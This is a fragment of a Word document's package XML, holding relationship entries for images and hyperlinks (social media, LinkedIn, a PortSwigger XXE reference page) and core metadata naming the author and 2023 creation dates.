Id="rId56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s://www.instagram.com/hackemate.pe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footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/@HackeMate" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe" TargetMode="External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inkedin.com/in/gianpaul-custodio-chavarr&#237;a" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId28" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto4.wdp"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto1.wdp"/><Relationship Id="rId31" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto5.wdp"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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CDAB-DFBB-40CE-BDC6-9B41E1BF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</Pages>
  <Words>1045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02211050 (Custodio Chavarria, Gianpaul Jesus)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>e202211050 (Custodio Chavarria, Gianpaul Jesus)</cp:lastModifiedBy>
  <cp:revision>69</cp:revision>
  <cp:lastPrinted>2023-07-03T21:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-28T03:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-03T21:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>